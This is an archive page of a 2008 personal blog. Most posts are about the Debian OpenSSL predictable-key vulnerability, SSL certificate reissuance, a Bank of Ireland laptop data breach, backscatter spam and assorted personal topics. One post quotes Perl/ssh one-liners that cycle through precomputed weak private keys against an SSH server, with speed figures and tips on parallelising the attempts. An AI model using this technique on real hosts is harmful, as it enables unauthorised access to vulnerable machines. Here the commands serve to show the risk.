Skip to content

Justin's Linklog Posts

MailChannels’ Traffic Control now free-as-in-beer

I’m on the technical advisory board for MailChannels, a company who make a commercial traffic-shaping antispam product, Traffic Control. Basically, you put it in front of your real MTA, and it applies "the easy stuff" — greet-pause, early-talker disconnection, lookup against front-line DNSBLs, etc. — in a massively scalable, event-driven fashion, handling thousands of SMTP connections in a single process. By taking care of 80% of the bad stuff upfront, it takes a massive load off of your backend — and, key point, off your SpamAssassin setup. ;)

Until recently, the product was for-pay and (relatively) hard to get your hands on, but as of today, they’re making it available as a download at http://mailchannels.com/download/. Apparently: "it’s free for low-volume use, but high volume users will need a license key."

Anyway, take a look, if you’re interested. I think it’s pretty cool. (And I’m not just saying that because I’m on their tech advisory board. ;)

LWN.net on the Debian OpenSSL fiasco

Great article from LWN.net regarding the Debian OpenSSL vulnerability:

It is in the best interests of everyone, distributions, projects, and users, for changes made downstream to make their way back upstream. In order for that to work, there must be a commitment by downstream entities — typically distributions, but sometimes users — to push their changes upstream. By the same token, projects must actively encourage that kind of activity by helping patch proposals and proposers along. First and foremost, of course, it must be absolutely clear where such communications should take place.

Another recently reported security vulnerability also came about because of a lack of cooperation between the project and distributions. It is vital, especially for core system security packages like OpenSSH and OpenSSL, that upstream and downstream work very closely together. Any changes made in these packages need to be scrutinized carefully by the project team before being released as part of a distribution’s package. It is one thing to let some kind of ill-advised patch be made to a game or even an office application package that many use; SSH and SSL form the basis for many of the tools used to protect systems from attackers, so they need to be held to a higher standard.

+1.

The viability of remote SSH key cracking

Here’s some pretty scary figures from Craig Hughes on the viability of an SSH worm:

when doing this, connecting to localhost:

find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@localhost'"'"'); system("ssh-add -D"); $keys = ""; }'

4.63user 3.06system 0:19.54elapsed

ie about 50 per second

when connecting remotely over the internet (ping RTT is ~60ms):

find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@example.com'"'"'); system("ssh-add -D"); $keys = ""; }'

1.10user 0.60system 0:35.15elapsed

ie about 6 per second over the internet.

Logging of the failures on the server side looks like this:

May 15 10:53:31 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50445;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:32 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50446;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:33 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50447;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:34 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50448;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:35 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50451;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:36 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50452;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:37 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50453;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:39 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50455;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:40 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50456;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:41 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50457;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:42 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50458;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:43 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50459;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1

ie it shows the connection attempt, but NOT the failure. It shows one connection attempt per 7 keys attempted.

So given that:

  1. RSA is the default if you don’t specify for ssh-keygen
  2. 99.99% of people use x86
  3. PID is sequential, and there’s almost certainly an uneven distribution in PIDs used by the keys out there in the wild

then:

Probably there’s about 10k RSA keys which are in some very large fraction of the (debian-generated) authorized_keys files out there. These can be attempted in about 1/2 an hour, remotely over the internet. You can hit the full 32k range of RSA keys in an hour and a half. Note that the time(1) output shows how little load this puts on the client machine — you could easily run against lots of target hosts in parallel; most of the time is spent waiting for TCP roundtrip latencies. Actually, given that, you could probably accelerate the attack substantially by parallelizing the attempts to an individual host so you have lots of packets in flight at any given time. You could probably easily get up towards the 50/s local number doing this, which brings time down to about 3-4 minutes for 10k keys, or 11 minutes for the full 32k keys.

Free SSL cert reissuance for Debian victims — unless you’re on RapidSSL

If you’ve been following the Debian OpenSSL pRNG security debacle, you may have noticed that there’s a painful problem for people who’ve used a Debian or Ubuntu system in the process of buying a commercial SSL key — they are in a situation where those commercially-purchased keys need to be regenerated.

(When an SSL key is obtained from a commercial Certificate Authority, you first have to generate a Certificate Signing Request on your own machine, then send that to the CA, who extracts its contents and applies a signature to produce a valid CA-issued certificate.)

Things are looking up for these victims, though — some smart cookie at Debian came up with these instructions:

SSL Certificate Reissuance

If you paid good money to have a vulnerable key signed by a Certificate Authority (CA), chances are your CA can re-issue a certificate for free, provided all information in the CSR is identical to the original CSR. Create a new key with a non-vulnerable OpenSSL installation, re-create the CSR with the same information as your original (vulnerable) key’s CSR, and submit it to your CA according to their reissuance policy:

  • GeoTrust: Here (Available throughout the lifetime of the certificate. Tucows/OpenSRS in this case, but the instructions are generic to any GeoTrust client.)
  • Thawte: Here (Available throughout the lifetime of the certificate.)
  • VeriSign: Unknown
  • GoDaddy: Here (Only possible within 30 days of the initial order. GoDaddy calls the process "re-keying", while they call the act of sending you the same signed certificate as your original order a "reissuance".)
  • ipsCA: Generate a new CSR as if you are purchasing a new certificate, follow through the procedure up until you get to the point where you are required to pay with your credit card. At that point contact support via their email and let them know that you are requesting a revocation and re-issue and include the ticket number of your new CSR request.
  • CAcert: This is a cost free certification authority. Simply revoke your old certificates and add new ones. (The key has to be created on a fixed machine and ONLY the certification request has to be uploaded!) At the moment the certificate generation will take some time as it seems that many users are re issue there certificate.
  • Digicert: Login to Your account to re-issue (free).

This is slightly incorrect, however (unfortunately for me). While GeoTrust claim to offer free reissuance of all its SSL certificates, they don’t really. Their low-cost RapidSSL certs require that you buy ‘reissue insurance’ for $20 to avail of this, if you need to reissue more than 7 days after the initial purchase. :( Wiki updated.

Update: RapidSSL certs are, indeed, now free to reissue! Use this URL and click through on the "buy" link for reissuance insurance — the price quoted will be $0. Wiki re-updated ;). (thanks to ServerTastic for the tip.)

Serious Debian/Ubuntu openssl/openssh bug found

via Reddit, this Debian Security announcement:

‘Luciano Bello discovered that the random number generator in Debian’s openssl package is predictable. This is caused by an incorrect Debian-specific change to the openssl package (CVE-2008-0166). As a result, cryptographic key material may be guessable.

It is strongly recommended that all cryptographic key material which has been generated by OpenSSL versions starting with 0.9.8c-1 on Debian systems (ie since 2006! –jm) is recreated from scratch. Furthermore, all DSA keys ever used on affected Debian systems for signing or authentication purposes should be considered compromised; the Digital Signature Algorithm relies on a secret random value used during signature generation.’

and, of course, here’s the Ubuntu Security Notice for the hole:

Who is affected

Systems which are running any of the following releases:

  • Ubuntu 7.04 (Feisty)
  • Ubuntu 7.10 (Gutsy)
  • Ubuntu 8.04 LTS (Hardy)
  • Ubuntu "Intrepid Ibex" (development): libssl <= 0.9.8g-8
  • Debian 4.0 (etch) (see corresponding Debian security advisory)

and have openssh-server installed or have been used to create an OpenSSH key or X.509 (SSL) certificate. All OpenSSH and X.509 keys generated on such systems must be considered untrustworthy, regardless of the system on which they are used, even after the update has been applied. This includes the automatically generated host keys used by OpenSSH, which are the basis for its server spoofing and man-in-the-middle protection.

It was apparently caused by this incorrect "fix" applied by the Debian maintainers to their package. One wonders why that fix never made it upstream.

Bad news….

Update: Ben Laurie tears into Debian for this:

What can we learn from this? Firstly, vendors should not be fixing problems (or, really, anything) in open source packages by patching them locally – they should contribute their patches upstream to the package maintainers. Had Debian done this in this case, we (the OpenSSL Team) would have fallen about laughing, and once we had got our breath back, told them what a terrible idea this was. But no, it seems that every vendor wants to "add value" by getting in between the user of the software and its author.

+1!

For what it’s worth, we in Apache SpamAssassin work closely with our Debian packaging team, tracking the debbugs traffic for the spamassassin package, and one of the Debian packagers is even on the SpamAssassin PMC. So that’s one way to reduce the risk of upstream-vs-package fork bugs like this, since we’d have spotted that change going in, and nixed it before it caused this failure.

Here’s a question: should the OpenSSL dev team have monitored the bug traffic for Debian and the other packagers? Do upstream developers have a duty to monitor downstream changes too?

This comment puts it a little strongly, but is generally on the money in this regard:

the important part for OpenSSL is to find a way to escape the blame for their fuck-up. They failed to publish the correct contact address for such important questions regarding OpenSSL. Branden (another commenter –jm) noted that the mail address mentioned by Ben is not documented anywhere. It is OpenSSL’s responsibility that they allowed the misuse of openssl-dev for offtopic questions and then silently moving the dev stuff to a secret other list nobody outside OpenSSL knew about.

I’m sure Debian is willing to take their fair share of the blame if OpenSSL finally admits that their mistake played a major role here as well. After all the Debian maintainer might have misrepresented the nature of his plans, but he gave warning signs and said he was unsure. But as it appears now all the people who might have noticed secretly left openssl-dev, the documented place for that kind of questions. This is hardly the fault of the maintainer.

Update 2: this Reddit comment explains the hole in good detail:

Valgrind was warning about unitialized data in the buffer passed into ssleay_rand_bytes, which was causing all kinds of problems using Valgrind. Now, instead of just fixing that one use, for some reason, the Debian maintainers decided to also comment out the entropy mixed in from the buffer passed into ssleay_rand_add. This is the very data that is supposed to be used to see the random number generator; this is the actual data that is being used to provide real randomness as a seed for the pseudo-random number generator. This means that pretty much all data generated by the random number generator from that point forward is trivially predictable. I have no idea why this line was commented out; perhaps someone, somewhere, was calling it with uninitialized data, though all of the uses I’ve found were with initialized data taken from an appropriate entropy pool.

So, any data generated by the pseudo-random number generator since this patch should be considered suspect. This includes any private keys generated using OpenSSH on affected Debian systems. It also includes the symmetric keys that are actually used for the bulk of the encryption.

A pretty major fuck-up, all told.

Update 3: Here’s a how-to page on wiki.debian.org put together by the folks from the #debian IRC channel. It has how-to information on testing your keys for vulnerability using a script called ‘dowkd.pl’, details of exactly what packages and keys are vulnerable, and instructions on how to regenerate keys in each of the (many) affected apps.

It notes this about Apache2 SSL keys:

According to folks in #debian-security, if you have generated an SSL key (normally the step just prior to generating the CSR, and then sending it off to your SSL certificate provider), then the certificate should be considered vulnerable.

So, bad news — SSL keys will need to be regenerated. Add ‘costly’ to the list of downsides. (Yet another update: this hasn’t turned out quite that badly after all — many CAs are now offering free reissuance of affected certs.)

Looking at ‘dowkd.pl’, it gets even worse for ssh users. It appears the OpenSSH packages on affected Debian systems could only generate 1 of only 262148 distinct keypairs. Obviously, this is trivial to brute-force. With a little precomputation (which would only take 14 hours on a single desktop!), an attacker can generate all of those keypairs, and write a pretty competent SSH worm. :(

Update: voila, precomputed keypairs, and figures on the viability of remote brute-forcing the keyspace in 11 minutes.

Full-text RSS bookmarklet

This site offers a nifty utility for dealing with those annoying sites which offer only partial text content in their RSS and Atom feeds.

Given an RSS or Atom feed’s URL, the CGI will iterate through the posts in the feed, scrape the full text of each post from its HTML page, and re-generate a new RSS feed containing the full text.

The one thing it’s missing is a one-click bookmarklet version. So here it is:

Full-text RSS Bookmarklet

Drag that to your bookmarks menu, and next time you’re looking at a partial-text feed, click the bookmark to transform the viewed page into the full-text version. Enjoy!

Guinness in Ireland dodges a bullet

Phew! The rumours were untrue. Diageo will not be closing down the Guinness brewery in Dublin 8, and will continue brewing the black stuff in Dublin 8, thankfully:

Diageo is to close its breweries at Kilkenny and Dundalk, significantly reduce its brewing capacity at St James’s Gate and build a new brewery on the outskirts of Dublin under a plan announced today.

The company said it would invest EUR 650 million (£520 million) between 2009 and 2013 in the restructuring.

The renovation of the St James’s Gate brewing operations is expected to cost around EUR 70 million and will see the volume of Guinness brewed there fall from around one billion pints a year, to just over 500 million.

This plant will serve the Irish and British markets and will be based on the Thomas St side of the site. The company said this would ensure that every pint of Guinness sold in Ireland would be brewed here. Approximately half of the 55 acre site will then be sold once the five-year project is complete.

Around 65 staff will remain in brewing operations at St James’s Gate with about 100 others due to transfer to the new Dublin plant. Although the company has yet to announce the exact location of its new brewery, the company says it will have a capacity of around nine million hectolitres, or around three times that of the refurbished St James’s Gate site. This new brewery will produce Guinness for export and ales and lagers for the Irish market.

Diageo said when the two Dublin breweries are fully operational in five years time it will transfer brewing out of the Kilkenny and Dundalk breweries and close these plants. This move will result in ‘a net reduction in staff of around 250’, the company said.

The company employs 800 people in its brewing operation and a total of 2,500 in the Republic and Northern Ireland.

Diageo said these two plants "do not have the scale necessary for sustained success in increasingly competitive market conditions".

The company said it would offer those employees relocation opportunities where possible. Those for whom relocation is not possible will be offered "a severance package alongside career counselling".

Operations at its Waterford brewery will be "streamlined" as part of the re-organisation leading to "some reduction in output". the current workforce of 27 in Waterford would be reduced to ‘around 18’ but Diageo was unable to confirm the extent of the output reduction.

The company says the St James’s Gate site it proposes to sell and the Kilkenny and Dundalk sites have an estimated value of EUR 510 million.

The Guinness Storehouse, which receives around 900,000 visitors a year, will continue to be based at St. James’s Gate.

The company estimates it will incur one-off costs of EUR 152 million during the restructuring and says this would be treated as an exceptional cost in the fiscal year ending in June 2008.

Paul Walsh, chief executive of Diageo said: ‘Over the last twelve months we have conducted a rigorous review of our brewing operations in Ireland. It examined many options and I believe it has identified the right formula for the long-term success of our business in Ireland and for the continued global success of the Guinness brand.’

"Our ambition is to combine the most modern brewing standards with almost 300 years of brewing tradition, craft and heritage."

Guinness has been brewed at St James’s Gate for almost 250 years. Guinness extract produced at the Dublin site is exported to more than 45 countries.

the Lisbon Treaty and Libertas’ astroturf

So, Irish voters will soon be voting in a state-wide referendum on the upcoming Treaty of Lisbon — the latest set of amendments to how the European Union is run.

Since ratification will require changes to the Irish constitution, we get to vote on these intricacies where most EU inhabitants do not. Unfortunately this means it’s not particularly "sexy" — it’s a pretty obtuse and boring set of issues, and deciding which way to vote is not easy, with such snore-worthy stuff at stake.

One of the organisations campaigning for a "no" vote in the referendum is called Libertas. Aileen forwarded on a very interesting article by Chekov Feeney on Indymedia Ireland about them, which is well worth a read if you’re interested in Irish politics and the international reach of US lobbying. Here’s some snippets:

Declan Ganley, president of Libertas, happens to be president of Rivada Networks, a US defence contractor (they supply emergency communications networks to the US intelligence community).

[…]

On Sunday April 20th, Libertas announced that Ulick McEvaddy was "joining the No To Lisbon Campaign" and publicised the event with a photo-opportunity of the two ‘entrepreneurs’ in front of the Libertas Campaign bus. McEvaddy is the first member of the Irish business and political elite to join the Libertas campaign since it emerged under the stewardship of Declan Ganley.

What’s particularly interesting about this is that McEvaddy is the CEO of Omega Air, a US defence contractor (they supply cargo planes and inflight refuelling services to the US military). […] According to the [ US Air Force’s Integrator Magazine ], "industry insiders say [McEvaddy’s] company has even approached U.S. intelligence agencies about tanking services for detainee transfers, to reduce dependence on foreign air fields." In other words, offering to provide inflight refuelling services to rendition flights so that they wouldn’t have to stop over at foreign airports such as Shannon on their way to "interrogate" suspects. A very accommodating offer indeed.

McEvaddy was also the figure who got himself appointed to the board of Knock airport with a view to opening it up to US military flights.

Nice guys, then.

The article goes on, and on, and on, detailing some shady transactions involving these guys and their US military/intelligence connections, the "astroturf" nature of the Libertas organisation, and the odd behaviour of the Libertas campaign in general.

It comes to this conclusion:

This article has examined the reality behing the Libertas campaign, the connections of its two high-profile backers, the implausibility of its message, the peculiar nature of its campaign and some of the underlying strategic differences at play. The conclusion is that the evidence suggests that Libertas is most likely to serve primarily as a vehicle for advancing US strategic interests.

Check it out — it’s a must-read.

BoI data breach: a sample customer notification

More on the Bank of Ireland 30,000-customer data breach (which is up to 31,500 people by now — BoI promised to contact the "affected" customers by post, warning them that their data had been leaked. If you were wondering what those letters might look like, wonder no more. Here’s one, via a friend who found himself in this unenviable position:

So it’s not just name, date of birth, and address — he notes that they’ve leaked ‘information on the current account I use to pay for the policy.’

Interestingly, he says that his life assurance policy was set up directly with their life assurance department, not via the local branch — which directly contradicts what BoI say on their website:

The laptops contained information relating to some customers who either obtained a quote or took out a Life Assurance policy with Bank of Ireland Life from the following branches: [… list of branches omitted…]

The update from 28 April doesn’t clarify this, either. Hmm.

Google Webmaster Tools now includes ‘goog-love.pl’

Back in 2006, I wrote a script I called "goog-love.pl"; it used Google’s now-dead SOAP search API (thanks, Nelson!) to figure out which Google queries your web site was "winning" on. Unfortunately, Google shut down new signups for the SOAP interface later that year.

I was just looking through Google’s Webmaster Tools page for taint.org, when I came across the Statistics / Top search queries page:

img

This is exactly what goog-love.pl produced. hooray!

Bank of Ireland: “we don’t understand fraud”

Check out this logic from the Bank of Ireland, spotted by waider in today’s news:

Last week, the bank said that medical records, bank account details, names, addresses and dates of birth of 10,000 customers were on the laptops. […]

Bank of Ireland said an assessment had concluded that the risk of fraud arising from the thefts was ‘very low’, as the data on the laptops did not include bank account passwords, PINs or copies of signatures.

So a fraudster would have medical records, bank account details, names, addresses and dates of birth of 10,000 customers, but the risk of fraud is ‘very low’? Incredible.

Update: make that 30,000 customers.

Update 2: 31,500 customers, and a sample letter.

Merry Spamiversary

Peter G. Neumann at the RISKS Forum notes that Last Friday was the anniversary of the sending of the first e-mail spam:

[Thanks to Mike Hogsett for noting this event, and Brad Templeton for recording it.]

What is allegedly the very first spam message was sent roughly 30 years over the ARPANET.

In seeing this, Mike was amused because he works with some of the people it was addressed to, of whom a few are still at SRI: NEUMANN@SRI-KA, GARVEY@SRI-KL, MABREY@SRI-KL, WALDINGER@SRI-KL and some of whom are retired: ENGELBART@SRI-KL, NIELSON@SRI-KL, GOLDBERG@SRI-KL (I am always amused when some of these old ARPANET addresses show up in today’s incarnations of spam.)

Also somewhat before Mike’s time, Geoff Goodfellow, Eric Kunzelman, Dan Lynch, and many others at SRI were instrumental in the evolution of the ARPANET.

Also included in the enormous enumerated TO: list (historically interesting in itself by not having been suppressed!) are Bill English (who was the catalyst for much of Doug Engelbart’s innovations being transitioned from SRI to PARC), Dave Farber, Irv Jacobs, Bob Metcalfe, Jon Postel (who by then had moved from SRI to ISI), three Sutherlands, and Lauren Weinstein, to name just a few.

Happy Birthday, Spam! Sorry I cannot wish you many happy returns.

What’s on this site, April 2008 edition

It’s been a while since I’ve listed the various sub-sites of taint.org in one post. I’ve just updated the taint.org wiki’s index page to include them, so might as well list them here, too:

Enjoy!

Bank of Ireland’s 10,000-customer security breach

Bank of Ireland, one of Ireland’s biggest high-street banks, was the subject of a breach notification yesterday — 4 laptops, containing unencrypted "sensitive personal information" about up to 10,000 customers, were stolen between June and October 2007. It seems the Irish Data Protection Commissioner was not informed until last Friday. The Financial Regulator is also looking into the incidents.

According to the Independent, the laptops ‘were being used by staff working for Bank of Ireland’s life assurance division. They contained the information about medical history, life assurance details, bank account details, names and addresses.’

This breach has raised quite a few issues.

First off, I was watching Questions and Answers last night, and was shocked by the naivete of the assembled panel. One panelist, for example, reckoned that common criminals wouldn’t understand the value of this data — so it was probably nothing to worry about!

There was absolutely no concept of how widespread identity theft has become — using stolen identity information to apply for credit cards is part of Petty Theft 101 these days, since filling out forms is a lot easier than breaking and entering, obviously. There was also no appreciation of how little protection Irish consumers have in this regard with current Irish banking T&Cs.

According to previous research, about 2% of accounts compromised in data breaches become victim to identity theft.

Some comments from the bank from those articles:

‘The data was not encrypted, although it is understood there was software security installed on the stolen computers.’

Doubtless, "software security" refers to some kind of useless Maginot Line boondoggle like Norton Internet Security. This would have absolutely no useful effect in this case. The only useful way to protect customer data on a stolen laptop is to use encrypted storage.

‘In the interim the bank has monitored all of these customer accounts and can confirm that there has been no evidence of fraudulent or suspicious activity.’

This is a fallacy. This data provides plenty of information regarding the customer’s identity — information which is useful to receive loans and credit fraudulently, elsewhere. Monitoring the bank’s accounts is of no help in that case. On top of that, identity information like your date of birth, mother’s maiden name, health status, and so on doesn’t expire — that info will still be useful for identity theft, 10 years from now, or as a stepping-stone to further fraud.

As John O’Shea noted on Twitter earlier, there was nothing on their website about it this morning; there is now, however — a broken link on the front page. oops!

Figuring out the puzzle and fixing the URL’s errors gets you to this page, which notes:

The laptops contained information relating to some customers who either obtained a quote or took out a Life Assurance policy with Bank of Ireland Life from the following branches:

  • Drogheda
  • Dunleer
  • Bagnelstown
  • Court Place Carlow
  • Stephens Green
  • Tallaght
  • Montrose

Anybody who is not a customer of these branches is not affected by this incident.

As far as I can make out, the bank didn’t issue this breach notification. It appears from the coverage that this information was first announced by Data Protection Commissioner Billy Hawkes to RTE yesterday, leaving the bank apparently scrambling to catch up:

"The thefts of the laptops were only brought to the attention of the appropriate authorities in the bank in the past number of weeks," Bank of Ireland said in a statement that offered no other explanation for the long delay.

It would have been so much better if BoI had been proactive with breach notification — examples from overseas have illustrated its value. As Adam Shostack has noted repeatedly over the past few years: the rules have changed.

As for repercussions for BoI, it’ll be interesting to see if anything happens. For "live" customer data on up to 10,000 customers to be stored, in unencrypted form, on a laptop is terrible security practice — but as far as I know, there are no laws or regulations requiring anything better in Ireland, unfortunately. :( However:

Consideration will be given as to what further action will be sought from Bank of Ireland to ensure that the obligations contained in the Data Protection Acts in this area are met.

On a broader level, this issue serves to highlight once again the absolute necessity for all organisations in the public and private sector to take their data protection responsibilities seriously. In particular, all organisations should be assessing immediately the necessity for storing personal data on laptops. If a need is found, appropriate security measures such as encryption should be put in place immediately.

Go Billy! ;)

The best thing to come out of Caerphilly

Caerphilly is a small commuter town in South Wales, notable mainly for Caerphilly cheese and a castle.

Well, you can add one more thing to that list; its inhabitants also provided some key data in a major health study, from which emerged one great finding — it turns out that if you’re male, sex twice a week reduces the risk of death from heart disease by about half:

Men who said they had sex twice a week had a risk of dying half that of the less passionate participants who said they had sex once a month, Dr. Davey-Smith’s team said.

No other risk factor showed a statistically significant link to the frequency of orgasm.

The authors said that they had tried to adjust the study’s design to account for a factor that might explain the findings — that healthier, fitter men with more healthy life styles engaged in more sex. Even so, they could not explain the differences in risk. Hormonal effects on the body resulting from frequent sex could be among other possible explanations for the findings, Dr. Davey-Smith said.

Here’s the science bit, via the BMJ — a paper entitled ‘Sex and death: are they related? Findings from the Caerphilly cohort study’:

Result: Mortality risk was 50% lower in the group with high orgasmic frequency than in the group with low orgasmic frequency, with evidence of a dose-response relation across the groups. Age adjusted odds ratio for all cause mortality was 2.0 for the group with low frequency of orgasm (95% confidence interval 1.1 to 3.5, test for trend P=0.02). With adjustment for risk factors this became 1.9 (1.0 to 3.4, test for trend P=0.04). Death from coronary heart disease and from other causes showed similar associations with frequency of orgasm, although the gradient was most marked for deaths from coronary heart disease. Analysed in terms of actual frequency of orgasm, the odds ratio for total mortality associated with an increase in 100 orgasms per year was 0.64 (0.44 to 0.95).

Conclusion: Sexual activity seems to have a protective effect on men’s health.

The perfect excuse ;) Thanks, Caerphilly!

My commute vs Jaffa Cakes

Last weekend, I picked up a super-cheap cycling computer in Aldi for 20 Euros. I cycle to work, and I thought it’d be fun to get some geeky number-crunching in on my daily commute.

Here are the figures for my trip into work:

  • Ride time: 12:16
  • Trip distance: 2.4 miles
  • Avg speed: 12.7 MPH
  • Max speed: 22.4 MPH
  • Total KCal work performed: 136
  • Max pulse rate: 146

Given that there are 46 kilocalories in a Jaffa Cake, 136 KCal means that every day, I can eat 3 Jaffa Cakes with impunity. Result! ;)

Also: some relevant commentary from Penny Arcade.

Google Calendar ‘Quick Add’ smart keyword bookmark

Google Calendar has a nifty feature, "Quick Add", where you can enter a natural-language string like "lunch with Justin, 1pm 20/4/08", it parses it, and adds an appointment to your calendar. However, the link in the Calendar UI can’t be bookmarked; you have to go to the Calendar page, wait for it to sloooowly load all its AJAX bits, hit the link, and only then type the appointment details, by which time I’ve forgotten it anyway ADD-style. ;)

Elias Torrez came up with a Firefox extension to use the Quick Add feature in one keypress, but in my opinion that’s overkill — I don’t want the overhead of another extension, the upgrade worries, and I don’t want it using up a keyboard shortcut either. I’d prefer to just have this as a Firefox Smart Keyword — and thankfully the trick is in the comments for his blog post, from someone called Bjorn. So here’s the deal:

Name: Google Calendar Quick Add

Location: http://www.google.com/calendar/event?ctext=+%s+&action=TEMPLATE&pprop=HowCreated%3AQUICKADD

Keyword: newcal

Description: add a new event in Google Calendar

enjoy!

Downloadable movies and the DVP5960

So Mulley mentions that Moviestar.ie are planning to offer downloadable movies. Great concept, but I can guarantee the execution will be crap on a stick. :(

First off, the content available:

‘When the service goes live on 1 May, customers will be able to avail of content from several Irish producers including Network Ireland Television, as well as Video International’s film library which includes films like The Little Shop of Horrors. The company is also seeking content from both the History and Biography Channels, which would mean a substantial back catalogue of documentary shows.’

Sorry, but: snore.

Secondly, the technology used:

‘Moviestar.ie content must be downloaded onto a PC or laptop but can then be transferred over to digital media players like the iPod Touch for viewing on the go. This service will be compatible with Apple Macs but only if the user downloads Windows Media Player.’

So in other words, it’s Windows Media. That means it won’t play on my TV through my MythTV box, on a USB stick plugged into a Philips DVD player, on my Linux laptop, or even on a normal DVD player using a burned DVD.

Too little, too late. Plenty of Irish consumers are already consuming downloaded video — as the popularity of the Philips DVP5960 demonstrates. For legal video downloads to work, they need to be somewhere remotely near as convenient and usable as BitTorrent.

Using DRM is just falling down the same rabbit hole that swallowed up downloadable music for 5 years. Nobody used that either, until gradually the companies involved realised that opening up was the only way to get customers, bringing us to where we are today — legal downloads using the MP3 format.

BTW, I know that’s the same DRM technology used by Channel 4’s "4oD" download service. Big deal — I don’t bother trying to watch that stuff either, for the same reasons. If Channel 4 jumped off a cliff, would Moviestar.ie jump after them?

img

(By the way, that Philips DVD player is a total success story. That’s a name-brand hardware manufacturer, making a low-end, $60 DVD player, with support for viewing downloaded XviD AVI movies on a USB stick. Apparently it’ll also play off USB hard disks, too. It’s immensely popular; for example, here’s a customer review of 10/10: "Best thing ever". Several of my friends have them, and praise them highly. I’m coming up to DVD player replacement time, and I’m planning to get one too.)

Backscatter rising

Recently, more and more people have been complaining about backscatter; its levels seem to have increased over the past few weeks.

If you’re unfamiliar with the terminology — backscatter is mail you didn’t ask to receive, generated by legitimate, non-spam-sending systems in response to spam. Here are some examples, courtesy of Al Iverson:

  • Misdirected bounces from spam runs, from mail servers who "accept then bounce" instead of rejecting mail during the SMTP transaction.
  • Misdirected virus/worm "OMG your mail was infected!" email notifications from virus scanners.
  • Misdirected "please confirm your subscription" requests from mailing lists that allow email-based signup requests.
  • Out of office or vacation autoreplies and autoresponders.
  • Challenge requests from "Challenge/Response" anti-spam software. Maybe C/R software works great for you, but it generates significant backscatter to people you don’t know.

It used to be OK to send some of these types of mail — but no longer. Nowadays, due to the rise in backscatter caused by spammer/malware abuse, it is no longer considered good practice to "accept then bounce" mail from an SMTP session, or in any other way respond by mail to an unauthorized address of the mail’s senders.

Backscatter as spam delivery mechanism

I would hazard a guess that this rise is due to one of the major spam-sending botnets adopting the use of "real" sender addresses rather than randomly-generated fake ones, probably in order to evade broken-by-design Sender-Address Verification filters.

There’s an alternate theory that spammers use backscatter as a means of spam delivery — intending for the mails to bounce, in effect using the bounce as the spam delivery mechanism. Symantec’s most recent "State of Spam" report in particular highlights this.

I don’t buy it, however. Compare their own example message — here’s what the mail originally sent by the spammer to the bouncer, rendered:

img

And here’s what it looks like once it passes through the bouncer’s mail system:

img2

That’s simply unreadable. There’s absolutely no way for a targeted end user to read the "payload" there…

Getting rid of it

I haven’t run into this recent spike in backscatter at all, myself, since I have a working setup that deals with it. This blog post describes it. If you’re using Postfix and SpamAssassin, it would be well worth taking a look; if you’re just using SpamAssassin and not Postfix, you should still try using the Virus Bounce Ruleset to rid yourself of various forms of unwanted bounce message.

Note that you need to set the ‘whitelist_bounce_relays’ setting to use the ruleset, otherwise its rules will not fire.

SPF

There’s a theory that setting SPF records (or other sender-auth mechanisms like DomainKeys or DKIM) on your domains, will reduce the amount of backscatter sent to your domains. Again, I doubt it.

Backscatter is being sent by old, legacy mail systems. These systems aren’t configured to take SPF into account either. When they’re eventually updated, it’s likely they’ll be fixed to simply not send "accept then bounce" responses after the SMTP transaction has completed. It’s unlikely that a system will be fixed to take SPF into account, but not fixed to stop sending backscatter noise.

It’s good advice to use these records anyway, but don’t do it because you want to stop backscatter.

What about my own bounces?

You might be worried that the SpamAssassin VBounce ruleset will block bounces sent in response to your own mail. As long as the error conditions are flagged during the SMTP transaction (as they should be nowadays), and you’ve specified your own mailserver(s) in ‘whitelist_bounce_relays’, you’re fine.

Liability for internet banking fraud in Ireland

Steven Murdoch at Light Blue Touchpaper notes that the UK banking code now includes wording to make the customer liable for losses attributable to them "acting without reasonable care", where "reasonable care" bizarrely includes installing anti-virus software on their PCs.

The Register also picked up on this, as did Brian Krebs in the Washington Post, comparing it with the vastly superior customer protection offered by the US banks.

I was curious, so I went looking at the Irish situation. Needless to say, it’s not pretty.

I couldn’t find anything in the Irish Banking Federation’s Code Of Practice for Personal Customers, unfortunately. However, AIB’s terms and conditions for use of their Internet Banking product contain this:

5 Transactions on the Account:

